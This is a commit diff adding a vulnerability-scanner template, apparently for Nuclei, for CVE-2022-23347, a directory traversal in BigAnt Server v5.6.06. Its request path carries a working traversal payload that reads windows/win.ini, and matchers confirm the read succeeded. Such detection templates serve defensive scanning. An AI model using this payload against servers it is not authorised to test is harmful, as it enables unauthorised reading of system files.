Windows 2022
parent
008e1d4ec2
commit
7d8eabd4c6
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2022-23347
|
||||
|
||||
info:
|
||||
name: BigAnt Software BigAnt Server v5.6.06 - Directory Traversal
|
||||
author: 0x_akoko
|
||||
severity: high
|
||||
description: BigAnt Software BigAnt Server v5.6.06 was discovered to be vulnerable to directory traversal attacks.
|
||||
reference:
|
||||
- https://www.cvedetails.com/cve/CVE-2022-23347
|
||||
- https://github.com/bzyo/cve-pocs/tree/master/CVE-2022-23347
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2022-23347
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2022,bigant,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "bit app support"
|
||||
- "fonts"
|
||||
- "extensions"
|
||||
condition: and
|
||||
part: body
|
Loading…
Reference in New Issue